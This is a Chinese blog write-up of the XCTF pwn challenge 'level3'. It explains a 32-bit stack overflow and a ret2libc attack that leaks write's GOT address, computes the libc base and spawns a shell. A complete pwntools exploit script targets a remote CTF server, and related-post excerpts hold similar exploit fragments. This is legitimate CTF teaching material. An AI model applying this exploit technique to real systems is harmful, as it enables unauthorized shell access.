level3(xctf)

最新推荐文章于 2022-10-08 23:25:14 发布
最新推荐文章于 2022-10-08 23:25:14 发布
阅读量478 收藏 1
点赞数
分类专栏: # xctf(pwn新手区) CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43868725/article/details/105962251
版权

0x0 程序保护和流程

保护:

流程:

main()

vulnerable_function()

很明显的栈溢出。

0x1 利用过程

整个程序中没有我们能利用的部分,但是题目给我们提供了一个libc。所以可以通过泄露got表的地址获取libc的基地址。libc中有system()函数,还有"/bin/sh"。因此我们先使用write()泄露got表中的地址计算出libc的基地址调用完成之后返回到vulnerable_function(),计算出system()函数和"/bin/sh"再内存中的地址,然后再进行一次栈溢出调用system("/bin/sh")。

0x2 exp

from pwn import *
elf=ELF('./a')
libc=ELF('./libc_32.so.6')
write_plt=elf.plt['write']
write_got=elf.got['write']
vul_addr=elf.symbols['vulnerable_function']
write_libc=libc.symbols['write']
system_libc=libc.symbols['system']
bin_sh_libc=libc.search("/bin/sh").next()
# sh=process('./a')
sh=remote('124.126.19.106','43610')
sh.recv()
payload='a'*(0x88+4)+p32(write_plt)+p32(vul_addr)+p32(1)+p32(write_got)+p32(4)
sh.sendline(payload)
write_addr=u32(sh.recv(4))
offset=write_addr-write_libc
system_addr=offset+system_libc
bin_sh_addr=offset+bin_sh_libc
sh.recv()
payload='a'*(0x88+4)+p32(system_addr)+p32(0)+p32(bin_sh_addr)
sh.sendline(payload)
sh.interactive()
whiteh4nd
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【ctf】xctf攻防世界level3!!
elsa________的博客
04-05 1582
level3题解: 首先,检查一下程序基本信息: 程序很简单,保护开的也差不多。但是需要注意,这道题单独给出了libc,而且根据题目提示,程序中没有现成的system函数。这就需要我们从libc中动态加载system函数。 初步思路:PIE没有开启,那么在libc中函数的offset就是固定的,只要确认了libc的base address,然后计算出system函数的offset,就可以定位...
level0(xctf)
weixin_43868725的博客
05-06 907
0x0 程序保护和流程 保护: 流程: main() vulnerable_function() 很明显的栈溢出,read()允许输入0x200个字符而buf只有0x80 0x1 利用过程 我们在ida的函数窗口处发现了一个callsystem(),可以直接getshell 所以我们只需要将返回地址覆盖成callsystem()的地址就可以拿到flag,buf=0x88*‘a’+p64(0...
xctflevel3
neuisf的博客
01-04 793
未调试,可能由错误! from pwn import * from LibcSearcher import * p=process('./level3') elf=ELF("./level3") write_plt=elf.plt["write"] read_plt=elf.plt["read"] #0x8048310 print "readplt:"+str(hex(read_plt)) ...
xctf level3
pondzhang的专栏
12-12 133
from pwn import * #p = process(['./level3'],env={"LD_PRELOAD":"./libc_32.so.6"}) p = remote("220.249.52.134",36907) libc = ELF("./libc_32.so.6") write_plt = 0x08048340 write_got = 0x0804A018 main = 0x0804844B #p = remote("220.249.52.133",54612) p.recvun.
xctf level3--沙窝李的王
weixin_43600412的博客
07-26 979
通过直接实战学习知识,这还是第一次这样学习,感觉到了压力-_-… level3 可以看到NX保护打开,也就是不能在栈中执行指令辽。 由于不知道NX保护的原理机制,特查询如下: NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。...
level3
weixin_33690963的博客
04-02 219
伸冤下:老师的评论是有看到!看完我就去修改程序了,忘记回复请原谅!= = 前阵子都在修改功能和思路,但是由于一个细节的错误找不到,导致没有成品可以上传...求谅解。 细心真的很重要 = =!!! import java.util.Scanner; public class Main { public static void main(String[] a...
3.level3-[XCTF-unserialize3]-[CVE-2016-7124]
qwsn
11-19 250
0x01、Web 1.XCTF-unserialize3 第一步:开启环境 图略 第二步:访问题目链接,发现了一段php代码,如下所示 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-95BsdC0I-1605762236401)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20201107140737760.png)] 第三步:分析代码,很明显这里有一个魔术方法__wakeup,
xctf pwn 踩坑笔记(一):以xctf入门题level3为例
xiongzixun的博客
10-30 498
操作环境:ubuntu16.04 +惠普台式机 IDA环境:win10 +联想笔记本** 1.打开文件 xctf中的附件一般为application/octet-stream 而且为了能够使用,我们必须要先通过chmod命令获得X权限 如果是压缩文件还要先unzip或者tar等试一下 然后,通过checksec 这个文件以后,一定要先关注Arch,也就是这个ELF究竟是64位,还是32位。 因...
XCTF PWN level0
prettyX的博客
06-09 300
查看基本信息 尝试运行 IDA F5 再看下vulnerable_function()函数,存在溢出 同时,还存在callsystem()函数 所以把返回地址,覆盖到callsystem()函数地址,即可 Exp 注意:因为Python2不再维护,编写脚本使用Python3,使用Python3和2的区别,就是把Payload作为占位的部分变成Bytes #python3 from pwn import * p=remote('111.200.241.244',..
XCTF PWN level3
qq_41743240的博客
04-14 402
检查一下保护机制 开了NX,不能执行shellcode,首先选择ROP方式获取shell 通过IDA反编译调试, 发现在vulnerable_function函数这里存在溢出漏洞 查询一下有没有可利用函数 无system和/bin/sh 本题可以有两种解题思路 思路一 根据题目给出的libc泄露system和/bin/sh 该如何泄露呢? 这里有一个公式: libc函数 = 程序函数 ...
level3 [XCTF-PWN]CTF writeup系列11-新手练习区大结局
重新启程
12-20 965
题目地址:level3 看看题目内容 从题目中可以看出,本题应该是一个没有提供system函数地址的栈溢出题目,那么我们本题的考点应该是从libc中提取system函数地址。 照例检查保护机制 root@mypwn:/ctf/work/python# checksec level3 [*] '/ctf/work/python/level3' Arch: i386-3...
ret2libc-泄露和不需要泄露
qq_36918532的博客
04-18 250
ciscn_2019_c_1 —需要泄露got 题目可在buuctf下载 安全检查,发现只开了NX保护(DEP) 执行程序会发现,程序第二次原模原样输出了((这种菜单题,我还以为是堆)) IDA查看反汇编代码 加密函数 其中x在bss段定义,一直在增加,所以会导致上面的第二次执行的时候长度>s,从而不执行加密那块,这可以用来泄露地址 也就是后面会变的只有比上一次输入长的部分 操作如下图 由于get可以一直输入,达到一定长度报段错误,这应该是说明覆盖到返回地址了,所以猜想应该是只要覆盖了返回地
ret2shellcode 的泄露puts@got
wing_7的博客
10-08 1096
现在rip在main+4处没执行puts,执行puts 后可以看到puts_got=> 0X601018里保存的是0X7FFDAA4E5430,可以使用ni si 进行调试看是否前后值有变化。手动设置栈上的值 发现 pop_rdi_ret设置的值 变换为0x4006f3 =》0x7fff004006f3(原因不明)发现read@got.pltb保存了read函数的blic中的地址。call read—> read的plt表 —>read的got表。jmp到的其实这是plt表对应函数的got表。
格式化字符串漏洞泄露got
Fzuim的博客
11-20 699
#include <stdio.h> int main() { char s[100]; scanf("%s", s); printf(s); return 0; } 编译命令:gcc -m32 -fno-stack-protector -no-pie -o fmt fmt.c 泄露的payload先贴出来,再理解 # coding:utf-8 from pwn import* from LibcSearcher import * context.log_level = '
18.9.19 Jarvis OJ PWN----[XMAN]level3
qq_42192672的博客
09-19 381
打开压缩包,看到了两个文件,surprise! 有个lib文件 checksec一波,发现没有保护栈 那就先找到可以栈溢出的地方哟,如下 可是问题来了,没有system函数,也没有/bin/sh字符串,但是在链接库(lib文件)中可以找到,如下 我们显然必须要知道system函数与/bin/sh字符在内存中的地址,之前我也不知道该怎么找,开始向大佬学姿势 key_point:...
Jarvis oj level3
发蝴蝶和大脑斧的博客
12-04 1130
下载下来发现有level3文件和libc.so文件,先checksec,和level2差不多,接着ida打开level3,没找到system函数和bin字符串,没什么办法了。接着去看so文件,libc是Linux下的ANSI C的函数库。找到了system函数和bin字符串。那么怎么利用呢? 首先了解plt和got表。链接 我是这么理解的:plt表中存放的是函数在got表中该项的地址,got表存放...
[pwn]ROP:信息泄露获取libc版本和地址
热门推荐
Breeze的博客
08-26 1万+
文章目录通过信息泄露获取libc版本和地址DynELF模块介绍pwn200 writeuppwn100 writeup 通过信息泄露获取libc版本和地址 有一些pwn题目中我们可以找到很明显的溢出,但程序中并没有system函数,也没有给出libc版本。但我们可以通过反复的溢出打印一些内存的值来在内存中搜索system的地址,这里主要使用的工具是pwntools中的D以内ELF模块。 DynEL...
level_0 [XCTF-PWN]CTF writeup系列5
重新启程
12-19 637
题目地址:level_0 先看下题目: 照例查看一下保护情况 root@mypwn:/ctf/work/python# checksec df928e471d0849fab9ff0ebe4bfe5ea1 [*] '/ctf/work/python/df928e471d0849fab9ff0ebe4bfe5ea1' Arch: amd64-64-little R...
XCTF pwn level2
weixin_46128614的博客
02-03 395
使用ida打开发现buf只有0x88,但是读取了0x100,存在溢出点 然后存在system函数和字符/bin/sh 有一点不太懂,选的是_system的地址,而不是system的地址,看了师傅的wp好像是这题的system函数申明了一个外部近指针,没有内容,不太明白 然后就是构造payload payload=“a”*(0x88+0x4)+p32(sys_addr)+p32(0)+p32...
xctf supersqli
最新发布
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入漏洞来获取敏感数据或者执行非授权操作。这个题目可以帮助参与者提升对于 SQL 注入漏洞的理解和防御能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值